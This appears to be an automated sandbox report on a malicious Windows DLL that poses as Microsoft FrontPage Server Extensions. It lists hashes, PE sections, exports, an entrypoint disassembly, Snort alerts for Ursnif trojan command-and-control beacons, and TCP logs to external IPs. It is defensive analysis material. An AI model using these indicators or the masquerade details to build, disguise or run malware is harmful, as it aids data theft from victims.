                                                                                                                                                                                                                                  SHA-256:3F35CAE4DFE865844B0252295FBAF19E05CAE5CA462DE4640F62DAD1E921DC71
                                                                                                                                                                                                                                  SHA-512:4C9FE56815CD9594B87CBC3749EAF40357E789C0051B6117D21878C0B5E66BA0625C3629B0E98DA4D910250885CFEF60797893CA15D4BB2FD12EFC402FF77AF6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ...................................FL..................F.@.. .....@.>...p.,Io.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.y..PROGRA~1..t......L.*Si.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*Sr...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*Sq......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......].............N......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5XFGIZ6WP2107RV40ZZA.temp
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5149
                                                                                                                                                                                                                                  Entropy (8bit):3.175529227779345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:q+dinP+IqC9GrIof1AsASFd+dinP+Iqh683GrIof1Acz++dinP+Iqx9GrIof1AVt:+P+s9S/1AJAP+N3S/1ApP+b9S/1Af
                                                                                                                                                                                                                                  MD5:237880D3E2A725AB718078878604A903
                                                                                                                                                                                                                                  SHA1:F3C59A147169B76319C0DF2721AE4217632BBA2D
                                                                                                                                                                                                                                  SHA-256:3F35CAE4DFE865844B0252295FBAF19E05CAE5CA462DE4640F62DAD1E921DC71
                                                                                                                                                                                                                                  SHA-512:4C9FE56815CD9594B87CBC3749EAF40357E789C0051B6117D21878C0B5E66BA0625C3629B0E98DA4D910250885CFEF60797893CA15D4BB2FD12EFC402FF77AF6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ...................................FL..................F.@.. .....@.>...p.,Io.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.y..PROGRA~1..t......L.*Si.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*Sr...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*Sq......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......].............N......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                                                                  Entropy (8bit):5.998813093039927
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                                                                                  • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                  File name:qT9Qk5aKTk.dll
                                                                                                                                                                                                                                  File size:243712
                                                                                                                                                                                                                                  MD5:58d9e2906f42336e9bee1137b4cf5839
                                                                                                                                                                                                                                  SHA1:7f29e42f6d317d7b11ad164a672e91e4515b5bc0
                                                                                                                                                                                                                                  SHA256:a9a0db068a2ed9c7b9b3cdbe7f3c1c82a6f9d2c1c7d4b820820927da004b6cbf
                                                                                                                                                                                                                                  SHA512:29feb57c0eaf537007a405c30975661f6e0608d46b78344f9de1c824612b8a396dad1abf00207ac7e76f83b04f4f62aae1b290ef6cc1196a83b5cea24772bec7
                                                                                                                                                                                                                                  SSDEEP:6144:tz3raG3DJCO3wVhIZhzG7WS7l8jE0DjSBj1:tDt4OtRZS7d
                                                                                                                                                                                                                                  File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g.P`...........!................b........@....@........................................................................

                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                  Icon Hash:aca1b2a9bab29200

                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Entrypoint:0x40bb62
                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                                                  DLL Characteristics:
                                                                                                                                                                                                                                  Time Stamp:0x60500767 [Tue Mar 16 01:18:31 2021 UTC]
                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                  Import Hash:f34df13d9f12a151ff03a5b61c12591c

                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                                                                                  sub esp, 24h
                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                  call dword ptr [004360A4h]
                                                                                                                                                                                                                                  mov dword ptr [ebp-14h], eax
                                                                                                                                                                                                                                  mov dword ptr [ebp-18h], eax
                                                                                                                                                                                                                                  push 0000001Dh
                                                                                                                                                                                                                                  push 004387C8h
                                                                                                                                                                                                                                  push 0043E7F0h
                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                  call dword ptr [004360ECh]
                                                                                                                                                                                                                                  mov dword ptr [ebp-18h], eax
                                                                                                                                                                                                                                  cmp eax, 00000000h
                                                                                                                                                                                                                                  jne 00007F5B7CAB9BC6h
                                                                                                                                                                                                                                  mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                                                  push 00000015h
                                                                                                                                                                                                                                  push 0000003Dh
                                                                                                                                                                                                                                  push dword ptr [00453FF8h]
                                                                                                                                                                                                                                  call 00007F5B7CAC5011h
                                                                                                                                                                                                                                  lea esi, dword ptr [00453E24h]
                                                                                                                                                                                                                                  xor esi, 068C2815h
                                                                                                                                                                                                                                  sub esi, 55h
                                                                                                                                                                                                                                  xor esi, dword ptr [00453F34h]
                                                                                                                                                                                                                                  sub esi, esi
                                                                                                                                                                                                                                  mov dword ptr [00453E24h], esi
                                                                                                                                                                                                                                  push 0000001Dh
                                                                                                                                                                                                                                  push 004387C8h
                                                                                                                                                                                                                                  push 0043E7F0h
                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                  call dword ptr [004360ECh]
                                                                                                                                                                                                                                  mov dword ptr [00453E24h], eax
                                                                                                                                                                                                                                  cmp eax, 00000000h
                                                                                                                                                                                                                                  jne 00007F5B7CAB9C07h
                                                                                                                                                                                                                                  jmp 00007F5B7CAB9155h
                                                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                                                  pop ebp
                                                                                                                                                                                                                                  push 0000001Dh
                                                                                                                                                                                                                                  push 004387C8h
                                                                                                                                                                                                                                  push 0043E7F0h
                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                  call dword ptr [004360ECh]
                                                                                                                                                                                                                                  mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                                                                  cmp eax, 00000000h
                                                                                                                                                                                                                                  jne 00007F5B7CAB9ACEh
                                                                                                                                                                                                                                  mov dword ptr [0043C210h], eax
                                                                                                                                                                                                                                  push 0000001Dh
                                                                                                                                                                                                                                  push 004387C8h
                                                                                                                                                                                                                                  push 0043E7F0h
                                                                                                                                                                                                                                  push 00000001h
                                                                                                                                                                                                                                  call dword ptr [004360ECh]
                                                                                                                                                                                                                                  cmp eax, 00000000h

                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0xf9130x610.text
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3a3bc0x78.data
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000xa9b4.rsrc
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x6a0000x2198.reloc
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x360000xf4.rdata
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                  .text0x10000xfa150xfc00False0.502294146825data6.16505277896IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  0x110000x820x200False0.263671875data1.90933265931IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  0x120000xbe0x200False0.36328125data2.50841842788IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  0x130000xdb0x200False0.392578125data2.84165337483IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  0x140000xaa890x200False0.400390625data2.8122785819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  0x1f0000xed0x200False0.427734375data2.99218036913IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  0x200000xaa6c0x200False0.357421875data2.55234629154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  0x2b0000xaaa80x200False0.423828125data2.88109872148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .rdata0x360000xf40x200False0.28515625data2.29418780158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .data0x370000x279ba0x1d000False0.527899380388data5.29515323456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .rsrc0x5f0000xa9b40xaa00False0.405078125data5.36948542132IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                  .reloc0x6a0000x21980x2200False0.801470588235data6.81021842164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                  RT_ICON0x5f3880x2e8dataEnglishUnited States
                                                                                                                                                                                                                                  RT_ICON0x5f6700x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                  RT_ICON0x5f7980x1628dBase IV DBT of \200.DBF, blocks size 0, block length 4608, next free block index 40, next free block 791621542, next used block 2795544736EnglishUnited States
                                                                                                                                                                                                                                  RT_ICON0x60dc00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                                                                                  RT_ICON0x612280x988dataEnglishUnited States
                                                                                                                                                                                                                                  RT_ICON0x61bb00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                                                                  RT_ICON0x62c580x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                                                                  RT_ICON0x652000x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                                                                                  RT_GROUP_ICON0x694280x14dataEnglishUnited States
                                                                                                                                                                                                                                  RT_GROUP_ICON0x6943c0x14dataEnglishUnited States
                                                                                                                                                                                                                                  RT_GROUP_ICON0x694500x14dataEnglishUnited States
                                                                                                                                                                                                                                  RT_GROUP_ICON0x694640x14dataEnglishUnited States
                                                                                                                                                                                                                                  RT_GROUP_ICON0x694780x14dataEnglishUnited States
                                                                                                                                                                                                                                  RT_GROUP_ICON0x6948c0x14dataEnglishUnited States
                                                                                                                                                                                                                                  RT_GROUP_ICON0x694a00x14dataEnglishUnited States
                                                                                                                                                                                                                                  RT_GROUP_ICON0x694b40x14dataEnglishUnited States
                                                                                                                                                                                                                                  RT_VERSION0x694c80x4ecdataEnglishUnited States

                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                  advapi32.dllDeregisterEventSource, ReportEventW, RegCloseKey, RegisterEventSourceW, RegOpenKeyExW
                                                                                                                                                                                                                                  dssenh.dllCPVerifySignature
                                                                                                                                                                                                                                  kernel32.dllVirtualProtectEx, FindFirstFileExW, EnterCriticalSection, TlsAlloc, LCMapStringW, GetTempPathW, GetFullPathNameW, QueryPerformanceCounter, TlsSetValue, MultiByteToWideChar, SetLastError, IsProcessorFeaturePresent, GetFileAttributesExW, WideCharToMultiByte, LeaveCriticalSection, OutputDebugStringW, GetModuleHandleExW, RaiseException, GetStringTypeW, LoadLibraryExW, RemoveDirectoryW, IsWow64Process, DeleteCriticalSection, GetProcAddress, InitializeCriticalSection, SetUnhandledExceptionFilter, TlsFree, Sleep, GetModuleFileNameW, IsDebuggerPresent, LoadLibraryA, GetCurrentProcess, GetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, GetModuleHandleW, RtlUnwind, InitializeSListHead, FindNextFileW, GetEnvironmentVariableW, SwitchToThread, CreateDirectoryW, FreeLibrary, FindClose, GetCurrentProcessId
                                                                                                                                                                                                                                  shell32.dllShellExecuteW
                                                                                                                                                                                                                                  user32.dllMessageBoxW

                                                                                                                                                                                                                                  Exports

                                                                                                                                                                                                                                  NameOrdinalAddress
                                                                                                                                                                                                                                  Aquatically10x401d64
                                                                                                                                                                                                                                  Episodically20x401f9b
                                                                                                                                                                                                                                  Kakapo30x402686
                                                                                                                                                                                                                                  Overdistantness40x4026c9
                                                                                                                                                                                                                                  Pseudopodal50x4027af
                                                                                                                                                                                                                                  Microphage60x4029d4
                                                                                                                                                                                                                                  Cytost70x402dd1
                                                                                                                                                                                                                                  Reattach80x402f9a
                                                                                                                                                                                                                                  Vigia90x4037fe
                                                                                                                                                                                                                                  Preallable100x403ac1
                                                                                                                                                                                                                                  Amphistomous110x403d01
                                                                                                                                                                                                                                  DllRegisterServer120x403f1f
                                                                                                                                                                                                                                  Americanistic130x404150
                                                                                                                                                                                                                                  Suprahumanity140x40454c
                                                                                                                                                                                                                                  Eupyrchroite150x404698
                                                                                                                                                                                                                                  Splitbeak160x404e58
                                                                                                                                                                                                                                  Andirin170x405002
                                                                                                                                                                                                                                  Drail180x4050c1
                                                                                                                                                                                                                                  Exequatur190x405267
                                                                                                                                                                                                                                  Meith200x405a59
                                                                                                                                                                                                                                  Undergrow210x4063bb
                                                                                                                                                                                                                                  Teaseableness220x4064de
                                                                                                                                                                                                                                  Joggler230x406589
                                                                                                                                                                                                                                  Swahilese240x4066c8
                                                                                                                                                                                                                                  Myelinated250x40676a
                                                                                                                                                                                                                                  Pyroxenic260x406af1
                                                                                                                                                                                                                                  Godspeed270x40710b
                                                                                                                                                                                                                                  Vigor280x407189
                                                                                                                                                                                                                                  Premedieval290x4078e3
                                                                                                                                                                                                                                  Papalizer300x40797c
                                                                                                                                                                                                                                  Coiled310x407a15
                                                                                                                                                                                                                                  Tarentala320x408120
                                                                                                                                                                                                                                  Hopbush330x40887a
                                                                                                                                                                                                                                  Bischofite340x40894f
                                                                                                                                                                                                                                  Everliving350x408ab4
                                                                                                                                                                                                                                  Mucigen360x408dc6
                                                                                                                                                                                                                                  Cigarito370x4090a9
                                                                                                                                                                                                                                  Cabree380x4091df
                                                                                                                                                                                                                                  DllUnregisterServer390x409499
                                                                                                                                                                                                                                  Unprovidenced400x4097e9
                                                                                                                                                                                                                                  Arosaguntacook410x409880
                                                                                                                                                                                                                                  Lysimeter420x40a518
                                                                                                                                                                                                                                  Nonchokebore430x40aca7
                                                                                                                                                                                                                                  Eccaleobion440x40af98
                                                                                                                                                                                                                                  Gelatinously450x40b1ad
                                                                                                                                                                                                                                  Tlapallan460x40b3aa
                                                                                                                                                                                                                                  Amphicyrtic470x40b770
                                                                                                                                                                                                                                  Alpinesque480x40b825
                                                                                                                                                                                                                                  Spermatocyst490x40b8d4
                                                                                                                                                                                                                                  Pseudostomous500x40b979
                                                                                                                                                                                                                                  Misogynism510x40bb62
                                                                                                                                                                                                                                  Delsarte520x40bca3
                                                                                                                                                                                                                                  Kobird530x40c0f8
                                                                                                                                                                                                                                  Dracocephalum540x40c4c7
                                                                                                                                                                                                                                  Goanese550x40c667
                                                                                                                                                                                                                                  Peltate560x40c9b9
                                                                                                                                                                                                                                  Sturiones570x40cb2d
                                                                                                                                                                                                                                  Meebos580x40cf4a
                                                                                                                                                                                                                                  Cardiameter590x40d35c
                                                                                                                                                                                                                                  Disguster600x40d620
                                                                                                                                                                                                                                  Monobromoacetone610x40d6cf
                                                                                                                                                                                                                                  Bacchanalize620x40d803
                                                                                                                                                                                                                                  Azeotropism630x40dbf1
                                                                                                                                                                                                                                  Holconoti640x40dc9d
                                                                                                                                                                                                                                  Microgametophyte650x40dfaf
                                                                                                                                                                                                                                  Crenated660x40e3e1
                                                                                                                                                                                                                                  Overgratefully670x40e482
                                                                                                                                                                                                                                  Prodramatic680x40e7ce
                                                                                                                                                                                                                                  Uncondensableness690x40ea33
                                                                                                                                                                                                                                  Disporous700x40eae2
                                                                                                                                                                                                                                  Trichophore710x40f00e
                                                                                                                                                                                                                                  Profluvium720x40f444
                                                                                                                                                                                                                                  Unreduceable730x40f4f2

                                                                                                                                                                                                                                  Version Infos

                                                                                                                                                                                                                                  DescriptionData
                                                                                                                                                                                                                                  LegalCopyrightCopyright 1995-1999 Microsoft Corporation, All rights reserved.
                                                                                                                                                                                                                                  FileVersion4.0.2.7523
                                                                                                                                                                                                                                  CompanyNameMicrosoft Corporation
                                                                                                                                                                                                                                  LegalTrademark1Microsoft, Windows, and FrontPage are registered trademarks of Microsoft Corporation, and WebBot is a trademark of Microsoft Corporation, in the United States and/or other countries.
                                                                                                                                                                                                                                  ProductNameMicrosoft FrontPage 2000
                                                                                                                                                                                                                                  ProductVersion4.0.2.7523
                                                                                                                                                                                                                                  FileDescriptionMicrosoft FrontPage Server Extensions
                                                                                                                                                                                                                                  OriginalFilenameRPCTEST.DLL
                                                                                                                                                                                                                                  Translation0x0409 0x04b0

                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  09/10/21-11:12:31.213751TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982480192.168.2.713.225.29.191
                                                                                                                                                                                                                                  09/10/21-11:13:13.069914TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988780192.168.2.713.225.29.191
                                                                                                                                                                                                                                  09/10/21-11:13:13.069914TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4988780192.168.2.713.225.29.191
                                                                                                                                                                                                                                  09/10/21-11:13:28.241213TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982480192.168.2.713.225.29.191
                                                                                                                                                                                                                                  09/10/21-11:13:39.121591TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4993580192.168.2.713.225.29.204
                                                                                                                                                                                                                                  09/10/21-11:13:39.121591TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4993580192.168.2.713.225.29.204
                                                                                                                                                                                                                                  09/10/21-11:13:53.557957TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4993880192.168.2.713.225.29.191

                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.503798008 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.503844976 CEST44349722104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.503936052 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.504120111 CEST49723443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.504144907 CEST44349723104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.504206896 CEST49723443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.505480051 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.505500078 CEST44349722104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.507729053 CEST49723443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.507756948 CEST44349723104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.556422949 CEST44349722104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.556560993 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.565166950 CEST44349723104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.565273046 CEST49723443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.583233118 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.583259106 CEST44349722104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.583275080 CEST49723443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.583297014 CEST44349723104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.583615065 CEST44349722104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.583667994 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.584525108 CEST44349723104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.584573030 CEST49723443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.584650993 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.627136946 CEST44349722104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.631097078 CEST44349722104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.631182909 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.631201982 CEST44349722104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.631298065 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.631516933 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.632389069 CEST44349722104.20.184.68192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:38.632472992 CEST49722443192.168.2.7104.20.184.68
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.031883955 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.031918049 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.031976938 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.032200098 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.032222033 CEST44349742172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.032289028 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.034219027 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.034238100 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.045172930 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.045206070 CEST44349742172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.082495928 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.083105087 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.083287001 CEST44349742172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.083370924 CEST49742443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.137413025 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.137429953 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.137868881 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.137954950 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.138336897 CEST49741443192.168.2.7172.67.70.134
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163327932 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163376093 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163408041 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163439989 CEST44349741172.67.70.134192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:39.163466930 CEST49741443192.168.2.7172.67.70.134
